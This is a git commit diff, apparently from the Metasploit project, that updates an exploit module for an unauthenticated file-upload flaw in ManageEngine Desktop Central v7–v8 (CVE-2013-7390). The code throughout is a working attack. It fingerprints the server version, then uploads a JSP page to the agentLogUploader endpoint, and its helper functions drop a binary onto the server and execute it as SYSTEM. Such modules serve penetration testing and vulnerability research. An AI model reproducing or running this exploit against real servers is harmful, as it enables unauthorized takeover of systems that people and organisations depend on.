Refactor and rename desktopcentra_file_upload
- Rewrite check method - Declare that v7 is also exploitable (tested and it works) - Rename to dc_agentlogupload_file_upload to match the other DC module's naming convention - Add CVE / OSVDB / Full disclosure referencesbug/bundler_fix
parent
9e8658268b
commit
d69049008c
|
@ -15,11 +15,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'DesktopCentral AgentLogUpload Arbitrary File Upload',
|
||||
'Name' => 'ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary file upload vulnerability in DesktopCentral 8.0.0
|
||||
below build 80293. A malicious user can upload a JSP file into the web root without
|
||||
authentication, leading to arbitrary code execution.
|
||||
This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to
|
||||
v8 build 80293. A malicious user can upload a JSP file into the web root without
|
||||
authentication, leading to arbitrary code execution as SYSTEM.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -28,13 +28,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf' ]
|
||||
[ 'CVE', '2013-7390' ],
|
||||
[ 'OSVDB', '100008' ],
|
||||
[ 'URL', 'http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2013/Nov/130' ],
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'ManageEngine DesktopCentral 8 server / Windows', {} ]
|
||||
[ 'Desktop Central v7 - v8 build 80292 / Windows', {} ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
|
@ -44,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
register_options([Opt::RPORT(8020)], self.class)
|
||||
end
|
||||
|
||||
|
||||
def upload_file(filename, contents)
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri('agentLogUploader'),
|
||||
|
@ -65,34 +69,39 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
# Test for Desktop Central
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri("configurations.do"),
|
||||
'method' => 'GET'
|
||||
'uri' => normalize_uri("configurations.do"),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
if res and res.code == 200 and res.body.to_s =~ /ManageEngine Desktop Central 8/ and res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/
|
||||
build = $1
|
||||
print_status("Manage Desktop Central 8 build #{build} found")
|
||||
if res and res.code == 200
|
||||
build = "0"
|
||||
if res.body.to_s =~ /ManageEngine Desktop Central 7/ or
|
||||
res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7
|
||||
print_status("#{peer} - Detected Desktop Central v7")
|
||||
elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ or
|
||||
res.body.to_s =~ /ManageEngine Desktop Central MSP 8/
|
||||
if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions)
|
||||
build = $1
|
||||
print_status("#{peer} - Detected Desktop Central v8 #{build}")
|
||||
else # DC v8 (earlier versions)
|
||||
print_status("#{peer} - Detected Desktop Central v8")
|
||||
end
|
||||
elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?)
|
||||
build = $1
|
||||
end
|
||||
if build < "80293"
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri("agentLogUploader"),
|
||||
'method' => 'POST'
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Uploading JSP to execute the payload")
|
||||
|
||||
|
@ -117,6 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
})
|
||||
end
|
||||
|
||||
|
||||
def jsp_drop_bin(bin_data, output_file)
|
||||
jspraw = %Q|<%@ page import="java.io.*" %>\n|
|
||||
jspraw << %Q|<%\n|
|
||||
|
@ -144,6 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
jspraw
|
||||
end
|
||||
|
||||
|
||||
def jsp_execute_command(command)
|
||||
jspraw = %Q|\n|
|
||||
jspraw << %Q|<%\n|
|
||||
|
@ -153,6 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
jspraw
|
||||
end
|
||||
|
||||
|
||||
def jsp_drop_and_execute(bin_data, output_file)
|
||||
jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
|
||||
end
|
Loading…
Reference in New Issue